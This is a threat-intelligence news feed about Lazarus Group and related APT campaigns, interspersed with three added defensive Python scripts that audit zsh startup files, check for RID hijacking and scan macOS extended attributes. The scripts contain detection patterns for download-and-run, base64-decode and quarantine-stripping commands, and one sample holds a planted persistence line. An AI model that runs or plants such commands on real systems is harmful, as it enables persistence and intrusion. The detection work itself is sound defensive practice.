What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
SecureMac.webp 2025-05-07 10:17:41 BlueNoroff (direct link) Also known as HEUR:Trojan-Downloader.OSX.Lazarus.gen. Type: Hybrid Threat. Platform: Mac OS 9. Last updated: 11/28/24 7:01 AM. Threat Level: High. Description: This malware installs a backdoor for remote command execution and abuses the zshenv configuration file for persistence, bypassing macOS security mechanisms such as Login Items notifications. BlueNoroff Threat Removal: MacScan can detect and remove the BlueNoroff hybrid threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan
Malware Threat APT 38 ★★
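The security-relevant point in the entry above is that a command planted in zshenv runs on every zsh start, interactive or not, and never goes through the Login Items mechanism that macOS would otherwise notify the user about. The following audit script is an added example, not SecureMac's tooling and not derived from the malware itself; the indicator patterns and the file list are assumptions a practitioner would tune for their own fleet.

```python
"""Heuristic audit of zsh startup files for planted persistence commands.
Added example, not SecureMac's tooling; the indicator list is an assumption."""
import re
from pathlib import Path

# Each indicator: (name, regex). A normal zshenv sets variables or PATH;
# downloading, decoding, backgrounding or running from scratch dirs is not
# something a shell startup file normally does.
INDICATORS = [
    ("remote_fetch_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("decode_and_run", re.compile(r"base64\s+(-d|--decode|-D)\b")),
    ("backgrounded_job", re.compile(r"\b(nohup|disown)\b|&\s*$|&\s*>/dev/null")),
    ("scratch_dir_exec", re.compile(r"(/tmp/|/var/tmp/|/Users/Shared/|/private/tmp/)\S+")),
    ("interpreter_inline", re.compile(r"\b(osascript|python3?|perl|ruby)\b\s+(-e|-c)\b")),
    ("hidden_path", re.compile(r"(?<![\w\-])(\$HOME|~)?/\.[\w.\-]+/\S*\.(sh|py|bin)")),
]

def audit_zshenv_text(text, source="<constructed>"):
    """Return [(source, line_no, indicator, line)] for suspicious lines.
    Comments and blank lines are skipped."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, rx in INDICATORS:
            if rx.search(line):
                findings.append((source, n, name, line))
    return findings

def audit_zshenv_files(paths=None):
    """Audit the real startup files on this host. Missing files are skipped.
    The default file list is an assumption: user and system zshenv plus zprofile."""
    paths = paths or [Path.home() / ".zshenv", Path("/etc/zshenv"), Path("/etc/zprofile")]
    out = []
    for p in paths:
        p = Path(p)
        if p.is_file():
            out.extend(audit_zshenv_text(p.read_text(errors="replace"), str(p)))
    return out

# Constructed sample: a normal Homebrew-style ~/.zshenv with one planted line.
SAMPLE = """\
# ~/.zshenv
export PATH="/opt/homebrew/bin:$PATH"
export EDITOR=vim
nohup /Users/Shared/.cache/updater.bin >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for src, n, ind, line in audit_zshenv_text(SAMPLE):
        print(f"{src}:{n} [{ind}] {line}")
```

Run `audit_zshenv_files()` on a Mac to check the real files; a hit is a lead, not a verdict, since legitimate tooling occasionally launches background helpers from rc files. The check complements, rather than replaces, Login Items review, precisely because zshenv is outside what that review covers.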
Blog.webp 2025-04-25 17:34:28 North Korean APT Hackers Pose as Companies to Spread Malware to Job Seekers
(direct link)
Silent Push Threat Analysts have uncovered a chilling new cyberattack campaign orchestrated by the North Korean Advanced Persistent Threat (APT) group known as Contagious Interview, also referred to as Famous Chollima, a subgroup of the notorious Lazarus group. This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular […]
Malware Threat APT 38 ★★★
The_Hackers_News.webp 2025-04-24 19:41:00 Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware
(direct link)
At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole. The activity targeted South Korea's software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. The earliest evidence of compromise was first detected in
Malware Vulnerability Threat APT 38 ★★★
Blog.webp 2025-04-24 17:07:50 Lazarus APT Targets Organizations by Exploiting One-Day Vulnerabilities
(direct link)
A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group, tracked as "Operation SyncHole," has compromised at least six South Korean organizations across the software, IT, financial, semiconductor, and telecommunications sectors since November 2024. According to detailed research, the attackers employed a combination of watering hole attacks and exploited vulnerabilities in widely […]
Vulnerability Threat APT 38 ★★★
bleepingcomputer.webp 2025-04-24 15:13:32 Lazarus hackers breach six companies in watering hole attacks
(direct link)
In a recent espionage campaign, the infamous North Korean threat group Lazarus targeted multiple organizations in the software, IT, finance, and telecommunications sectors in South Korea. [...]
Threat APT 38 ★★★
The_State_of_Security.webp 2025-04-16 02:46:50 APT Rogues' Gallery: The World's Most Dangerous Cyber Adversaries
(direct link)
Advanced Persistent Threat (APT) groups are not a new scourge. These sophisticated, state-sponsored cyber adversaries, with deep pockets and highly advanced technical skills, conduct prolonged and targeted attacks to infiltrate networks, exfiltrate sensitive data, and disrupt critical infrastructure. The stakes have never been higher, so in this blog we'll look at some of the most notorious APT actors, their unique Tactics, Techniques, and Procedures (TTPs), and attacks attributed to them, and offer a few tips on how to defend against them. The Lazarus Group Originating from North Korea, the...
Threat Technical APT 38 ★★★
The_Hackers_News.webp 2025-04-03 17:52:00 Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware
(direct link)
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector and deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
Malware Threat APT 38 ★★★
DarkReading.webp 2025-04-01 13:21:21 Lazarus APT Jumps on ClickFix Bandwagon in Recent Attacks
(direct link)
A continuation of the North Korean nation-state threat's campaign against job seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor.
Threat APT 38 ★★
RecordedFuture.webp 2025-02-27 15:28:39 FBI urges crypto community to avoid laundering funds from Bybit hack
(direct link)
The bureau attributed the $1.5 billion hack to the North Korean threat actor known as TraderTraitor, or Lazarus, following similar assessments by cybersecurity researchers.
Hack Threat APT 38 ★★★
The_Hackers_News.webp 2025-02-27 12:45:00 Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers
(direct link)
The U.S. Federal Bureau of Investigation (FBI) formally linked the record-breaking $1.5 billion Bybit hack to North Korean threat actors, as the company's CEO Ben Zhou declared a "war against Lazarus." The agency said the Democratic People's Republic of Korea (North Korea) was responsible for the theft of the virtual assets from the cryptocurrency exchange, attributing it to a specific cluster
Hack Threat APT 38 ★★★
DarkReading.webp 2025-02-25 10:16:39 North Korea's Lazarus Pulls Off Biggest Crypto Heist in History
(direct link)
Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from the exchange Bybit. It was carried out by interfering with a routine transfer between wallets.
Threat APT 38 ★★★★
The_Hackers_News.webp 2025-02-14 23:58:00 Lazarus Group Deploys Marstech1 JavaScript Implant in Targeted Developer Attacks (direct link) The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that's associated with a profile named "
Malware Threat APT 38 ★★
Mandiant.webp 2025-02-11 20:00:00 Cybercrime: A Multifaceted National Security Threat (direct link) Executive Summary Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions. A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare's share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks means that they must be taken seriously as a national security threat, no matter the motivation of the actors behind them. Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or to co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to its war in Ukraine.
GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine, and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims' crypto wallets. Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups, often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and between the public and private sectors on systemic solutions such as increasing education and resilience efforts.
Ransomware Malware Tool Vulnerability Threat Legislation Medical Cloud Technical APT 41 APT 38 APT 29 APT 43 APT 44 ★★★
The_Hackers_News.webp 2025-01-29 22:26:00 Lazarus Group Uses React-Based Admin Panel to Control Global Cyber Attacks (direct link) The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns. "Each C2 server hosted a web-based administrative platform, built with a React application and a Node.js API," SecurityScorecard's
Threat APT 38 ★★★
DarkReading.webp 2025-01-29 21:39:00 Researchers Uncover Lazarus Group Admin Layer for C2 Servers (direct link) The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang.
Threat APT 38 ★★★
TechWorm.webp 2025-01-25 20:07:25 Hackers Using RID Hijacking To Create Admin Accounts In Windows (direct link) Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to researchers at ASEC, AhnLab's security intelligence center, the hacking group behind the attack is the "Andariel" threat group, linked to North Korea's Lazarus hacker group. "RID Hijacking is an attack technique that involves modifying the RID value of an account with low privileges, such as a regular user or a guest account, to match the RID value of an account with higher privileges (Administrator). By modifying the RID value, threat actors can deceive the system into treating the account as having administrator privileges," AhnLab wrote in a blog post published on Thursday. In Windows, a Relative Identifier (RID) is the final component of a Security Identifier (SID), which uniquely identifies each user and group within a domain or on a standalone machine. For instance, the built-in Administrator account has RID 500, the Guest account RID 501, the Domain Admins group RID 512, and regular user accounts are numbered from 1000 upwards. In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as the Administrator account. As a result, Windows grants administrative privileges to the account. However, to pull this off, attackers need write access to the SAM (Security Account Manager) registry hive, which means they must already hold SYSTEM-level access on the targeted machine. Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt.
While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn't allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected, and doesn't persist after a system reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a "$" character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account's privileges to the administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking. Although SYSTEM access would allow the direct creation of administrator accounts, this method is less conspicuous, making it harder to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder. To reduce the risk of RID hijacking, system administrators should implement proactive measures such as:
• Use the Local Security Authority Subsystem Service (LSASS) to monitor unusual login attempts and password changes.
• Prevent unauthorized access to the SAM registry.
• Restrict the use of tools like PsExec and JuicyPotato.
• Disable guest accounts.
• Enforce multi-factor authentication (MFA) for all user accounts, including low-privileged ones.
Malware Tool Threat APT 38 APT 45 ★★
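The entry above explains the mechanism (the RID stored in the account's SAM data no longer matches the account the key was created for) but not how a defender would confirm it. The following check is an added example, not AhnLab's tooling. It works over an offline copy of the SAM data: each local account lives under HKLM\SAM\SAM\Domains\Account\Users\<RID as 8 hex digits>, the binary "F" value of that key carries the RID that logon actually uses, and Users\Names\<username> maps names back to RIDs. The assumption, stated in the code as well, is that the RID sits at offset 0x30 of "F" as a little-endian DWORD with the account-control flags at 0x38, the layout documented by common SAM parsers; the input here is a constructed dict rather than a real hive.

```python
"""Offline check for RID hijacking in SAM account data.
Added example, not AhnLab's tooling. Assumed 'F' layout: RID at 0x30 (DWORD,
little-endian), account-control flags at 0x38 (WORD). On a real host, feed it
an exported SAM hive parsed with a registry library; never edit a live SAM."""
import struct

F_RID_OFFSET = 0x30          # assumed offset of the DWORD RID inside 'F'
F_ACB_OFFSET = 0x38          # assumed offset of the account-control flags
ACB_DISABLED = 0x0001
WELL_KNOWN = {500: "Administrator", 501: "Guest", 503: "DefaultAccount",
              504: "WDAGUtilityAccount"}

def make_f(rid, acb=0, size=0x50):
    """Build a minimal 'F' blob for the constructed sample."""
    buf = bytearray(size)
    struct.pack_into("<I", buf, F_RID_OFFSET, rid)
    struct.pack_into("<H", buf, F_ACB_OFFSET, acb)
    return bytes(buf)

def rid_from_f(f):
    """RID the logon process will honour, read from the 'F' value."""
    (rid,) = struct.unpack_from("<I", f, F_RID_OFFSET)
    return rid

def check_rid_hijack(users, names):
    """users: {key_name_hex: F_bytes} from Users\\; names: {username: rid}
    from Users\\Names. Returns a list of (severity, username, detail)."""
    findings = []
    by_rid = {rid: name for name, rid in names.items()}
    effective = {}
    for key, f in users.items():
        key_rid = int(key, 16)           # RID the key was created for
        f_rid = rid_from_f(f)            # RID the account now claims
        name = by_rid.get(key_rid, f"<rid {key_rid}>")
        effective.setdefault(f_rid, []).append(name)
        if f_rid != key_rid:
            findings.append(("HIGH", name,
                f"key RID {key_rid} but F-value RID {f_rid} "
                f"({WELL_KNOWN.get(f_rid, 'unknown')}): RID hijacking"))
        if name.endswith("$"):
            findings.append(("MEDIUM", name,
                "trailing '$' hides the account from normal listings"))
    # Two keys resolving to one effective RID is the hijack seen from the
    # other side: the victim RID now has more than one owner.
    for rid, owners in effective.items():
        if len(owners) > 1:
            findings.append(("HIGH", ",".join(sorted(owners)),
                f"{len(owners)} accounts share effective RID {rid}"))
    return findings

# Constructed sample: healthy Administrator/Guest/alice, plus a hidden
# 'svc_backup$' whose F value has been rewritten to RID 500.
SAMPLE_NAMES = {"Administrator": 500, "Guest": 501, "alice": 1001, "svc_backup$": 1002}
SAMPLE_USERS = {
    "000001F4": make_f(500),
    "000001F5": make_f(501, acb=ACB_DISABLED),
    "000003E9": make_f(1001),
    "000003EA": make_f(500),   # key says 1002, F says 500: hijacked
}

if __name__ == "__main__":
    for sev, who, detail in check_rid_hijack(SAMPLE_USERS, SAMPLE_NAMES):
        print(f"{sev:6} {who:14} {detail}")
```

The key-name-versus-F comparison is the durable signal: the article notes that the actor deleted and later restored the account from a registry backup, so an alert keyed only on account creation or group-membership events can be timed around, whereas the mismatch is present whenever the account exists at all.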
The_Hackers_News.webp 2025-01-15 21:07:00 Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99 (direct link) The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat
Malware Threat APT 38 ★★
RiskIQ.webp 2024-12-30 12:02:43 Weekly OSINT Highlights, 30 December 2024 (direct link)
## Snapshot
Last week's OSINT reporting highlights the persistence and evolution of cyber threats targeting a wide range of sectors, from cryptocurrency exchanges to aerospace and defense industries. The predominant attack vectors include phishing, exploitation of long-standing vulnerabilities, and the use of advanced malware like StealBit, OtterCookie, and VBCloud. Threat actors such as North Korea's Lazarus Group and TraderTraitor, as well as botnets like FICORA and CAPSAICIN, continue to refine their tactics, leveraging social engineering, compromised software repositories, and ransomware-as-a-service to achieve their objectives. These campaigns predominantly target high-value organizations and unpatched systems, emphasizing the importance of addressing known vulnerabilities and monitoring for sophisticated attack chains.
## Description
1. [StealBit Data Exfiltration Tool](https://sip.security.microsoft.com/intel-explorer/articles/68a374b4): The LockBit ransomware group employs StealBit as part of its ransomware-as-a-service program, facilitating data theft in double extortion attacks. Recent updates to the tool broaden its target base and enhance efficiency, allowing faster data exfiltration and streamlined operations.
2. [FICORA and CAPSAICIN Botnets](https://sip.security.microsoft.com/intel-explorer/articles/77c183a0): FortiGuard Labs observed global activity from the FICORA and CAPSAICIN botnets, exploiting long-standing vulnerabilities in D-Link devices. These botnets, targeting unpatched systems, leverage DDoS capabilities and advanced features to dominate infected devices, focusing on East Asia and other global regions.
3. [OtterCookie and the Contagious Interview Campaign](https://sip.security.microsoft.com/intel-explorer/articles/b5a152a8): North Korean actors deploy OtterCookie malware through fake job offers to developers, targeting cryptocurrency wallets and sensitive data. Infection methods include compromised GitHub and npm projects, with evolving variants enhancing data theft and lateral movement.
4. [TraderTraitor's $308 Million Cryptocurrency Heist](https://sip.security.microsoft.com/intel-explorer/articles/9cd8b8b5): The North Korean TraderTraitor group stole $308 million from Japan's DMM Bitcoin, leveraging LinkedIn for social engineering and GitHub for malware delivery. By compromising a Japanese cryptocurrency wallet company, the group infiltrated systems to manipulate legitimate transactions.
5. [Lazarus Group's DeathNote Campaign](https://sip.security.microsoft.com/intel-explorer/articles/3b7cea68): Lazarus Group continues targeting industries like aerospace and cryptocurrency through Operation DreamJob, using trojanized tools and DLL side-loading techniques. Recent attacks deploy advanced malware strains to evade detection, establish persistence, and enable lateral movement within targeted systems.
6. [Cloud Atlas 2024 Campaigns](https://sip.security.microsoft.com/intel-explorer/articles/caa75881): Cloud Atlas targets Eastern Europe and Central Asia with phishing emails exploiting Equation Editor vulnerabilities, delivering VBShower and VBCloud malware. These tools use PowerShell scripts for data theft, lateral movement, and exfiltration, with region-specific tactics to avoid detection.
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Ransomware Malware Tool Vulnerability Threat Cloud APT 38 ★★
Blog.webp 2024-12-23 20:06:03 Lazarus Group Targets Nuclear Industry with CookiePlus Malware (direct link) KEY SUMMARY POINTS Securelist by Kaspersky has published its latest threat intelligence report focused on the activities of…
Malware Threat APT 38 ★★★★
The_Hackers_News.webp 2024-12-20 16:14:00 Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware (direct link) The Lazarus Group, an infamous threat actor linked to the Democratic People's Republic of Korea (DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024. The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are
Malware Threat APT 38 ★★★★
RiskIQ.webp 2024-11-18 12:22:31 Weekly OSINT Highlights, 18 November 2024 (direct link)
## Snapshot
Last week's OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movement, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea's Lazarus and China's TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors. The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems.
## Description
1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions.
2. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities.
3. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan's manufacturing sector, focusing on the maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics.
4. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems.
5. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence's enduring interest in monitoring and disrupting Tibetan and other minority organizations.
6. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-32046 and CVE-2023-36025 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses.
7. [Lazarus Group's macOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps built with the Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin
Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical APT 41 APT 38 ★★★
RiskIQ.webp 2024-11-15 15:40:32 Hackers use macOS extended file attributes to hide malicious code
## Snapshot
Researchers at Group-IB have identified a new trojan targeting macOS, dubbed RustyAttr, that leverages extended attributes (EAs) of macOS files to conceal malicious code.
## Description
EAs are metadata associated with files and directories in various file systems. This code smuggling is reminiscent of the [Bundlore adware approach in 2020](https://security.microsoft.com/intel-explorer/articles/71a3eed3), which also targeted macOS by hiding payloads in resource forks. Resource forks were largely deprecated and replaced by the application bundle structure and EAs. The RustyAttr malware uses the Tauri framework to build malicious apps that execute a shell script stored in an EA named 'test'. Tauri creates lightweight desktop apps with a web frontend (HTML, CSS, JavaScript) and a Rust backend. These apps run JavaScript that retrieves the shell script from the 'test' EA and executes it. Some samples simultaneously display decoy PDFs or error dialogs to distract the user. The decoy PDFs, and one of the malicious application bundles, were sourced from a pCloud instance containing cryptocurrency-related content. The applications were likely signed with a leaked certificate that Apple has since revoked. macOS Gatekeeper currently blocks these applications from running unless the user actively chooses to override its protections. Although Group-IB could not analyze the next-stage malware, they found that the staging server connects to an infrastructure endpoint of the known North Korean threat actor Lazarus (tracked by Microsoft as [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5)). Group-IB researchers suggest that Lazarus is trying out new ways to deliver malware.
This discovery comes alongside a similar [report from SentinelLabs](https://security.microsoft.com/intel-explorer/articles/aea544a9) about the North Korean threat actor BlueNoroff (tracked by Microsoft as [Sapphire Sleet](https://security.microsoft.com/intel-profiles/45e4b0c21eecf6012661ef6df36a058a0ada1c6be74d8d2011ea3699334b06d1)), which has been using related evasion techniques on macOS, including cryptocurrency-themed phishing and modified 'Info.plist' files to retrieve second-stage payloads. It remains unclear whether the RustyAttr and BlueNoroff campaigns are connected, but together they highlight a trend of North Korean actors focusing on macOS systems for their operations.
## Recommendations
Group-IB recommends keeping macOS Gatekeeper enabled to protect your system from harmful software. Additionally, Microsoft recommends the following mitigations to reduce the impact of this threat.
- Only install apps from trusted sources and official stores, like the Google Play Store and Apple App Store.
- Never click on unknown links received through ads, SMS messages, emails, or similar untrusted sources.
- Avoid granting SMS permissions, notification listener access, or accessibility access to any applications without a strong understanding of why the application needs it.
- To learn more about preventing trojans or other malware from affecting individual devices, [read about preventing malware infection](https://www.microsoft.com/security/business/security-101/what-is-malware).
## References
[Hackers use macOS extended file attributes to hide malicious code](https://www.bleepingcomputer.com/news/security/hackers-use-macos-extended-file-attributes-to-hide-malicious-code/). Bleeping Computer (accessed 2024-11-14)
[Stealthy Attributes of APT Lazarus: Evading Detection with Extended Attributes](https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/). Group-IB (accessed 2024-11-14)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Malware Threat Prediction APT 38 ★★
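A practitioner's check for the extended-attribute technique described in the RustyAttr report, as an added example (this is not Group-IB's tooling or anything from the original report): it walks a directory such as an application bundle, reads every entry's extended attributes, skips Apple's own `com.apple.*` metadata, and flags attribute values that look like shell scripts or are unusually large opaque blobs. Only the attribute name 'test' comes from the report; the marker regexes, the 1 KiB size threshold and the fallback to the `xattr(1)` command on macOS (where CPython lacks `os.listxattr`) are this example's own assumptions.

```python
"""Flag extended attributes (xattrs) whose value looks like a script payload.

Added example: scans a tree (e.g. an .app bundle), reads each entry's xattrs
and reports attributes that carry shell-script-like content or large opaque
data outside Apple's own metadata namespace. All heuristics are assumptions.
"""
import os
import re
import subprocess
import sys
from typing import Dict, Iterator, List, Tuple

# System namespaces treated as benign by name (assumption).
BENIGN_ATTR_PREFIXES = ("com.apple.", "security.", "system.", "trusted.", "user.xdg.")
LARGE_ATTR_BYTES = 1024  # assumed threshold for an "unusually large" opaque value

# Patterns a shell-script payload stored in an xattr would typically contain (assumptions).
SCRIPT_MARKERS = (
    re.compile(rb"^#!\s*\S*/(env\s+)?(ba|z|k)?sh\b", re.M),  # shell shebang
    re.compile(rb"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),       # download-and-pipe-to-shell
    re.compile(rb"\b(osascript|launchctl|nohup)\b"),         # macOS execution/persistence helpers
    re.compile(rb"\bchmod\s+\+x\b"),                         # marking a dropped file executable
    re.compile(rb"\bbase64\s+(-d|-D|--decode)\b"),           # decoding an embedded stage
    re.compile(rb"\bxattr\s+-[dc]\b"),                       # stripping quarantine flags
)


def looks_like_script(value: bytes) -> bool:
    """Return True if the attribute value matches any shell-script marker."""
    sample = value[:4096]
    return any(pattern.search(sample) for pattern in SCRIPT_MARKERS)


def suspicious_attrs(attrs: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Classify one entry's xattrs; returns (attribute name, reason) pairs."""
    findings: List[Tuple[str, str]] = []
    for name, value in attrs.items():
        if name.startswith(BENIGN_ATTR_PREFIXES):
            continue
        if looks_like_script(value):
            findings.append((name, "script-like payload"))
        elif len(value) >= LARGE_ATTR_BYTES:
            findings.append((name, f"large opaque value ({len(value)} bytes)"))
    return findings


def read_xattrs(path: str) -> Dict[str, bytes]:
    """Read all xattrs of one path. Uses os.*xattr on Linux; macOS CPython lacks
    those functions, so there we fall back to the system xattr(1) tool."""
    if hasattr(os, "listxattr"):
        try:
            names = os.listxattr(path, follow_symlinks=False)
            return {n: os.getxattr(path, n, follow_symlinks=False) for n in names}
        except OSError:
            return {}
    try:
        names = subprocess.run(["xattr", path], capture_output=True,
                               text=True, check=True).stdout.split()
        attrs: Dict[str, bytes] = {}
        for n in names:
            # -px prints the raw value as hex, so binary payloads survive intact
            hexdump = subprocess.run(["xattr", "-px", n, path], capture_output=True,
                                     text=True, check=True).stdout
            attrs[n] = bytes.fromhex("".join(hexdump.split()))
        return attrs
    except (OSError, subprocess.CalledProcessError, ValueError):
        return {}


def scan_tree(root: str) -> Iterator[Tuple[str, List[Tuple[str, str]]]]:
    """Yield (path, findings) for every file or directory carrying suspicious xattrs."""
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            path = os.path.join(dirpath, entry)
            findings = suspicious_attrs(read_xattrs(path))
            if findings:
                yield path, findings


if __name__ == "__main__":
    # Usage: python xattr_scan.py /Applications/Suspicious.app
    for path, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        for name, reason in findings:
            print(f"{path}: xattr '{name}': {reason}")
```

Because the attribute name is attacker-chosen, the scan classifies by content rather than by name; a hit is a triage lead to pull the value and the bundle's signing state, not proof of infection.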
The_Hackers_News.webp 2024-11-14 15:21:00 New RustyAttr Malware Targets macOS Through Extended Attribute Abuse
Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including
Malware Threat APT 38 ★★★
RiskIQ.webp 2024-10-28 11:27:40 Weekly OSINT Highlights, 28 October 2024
## Snapshot
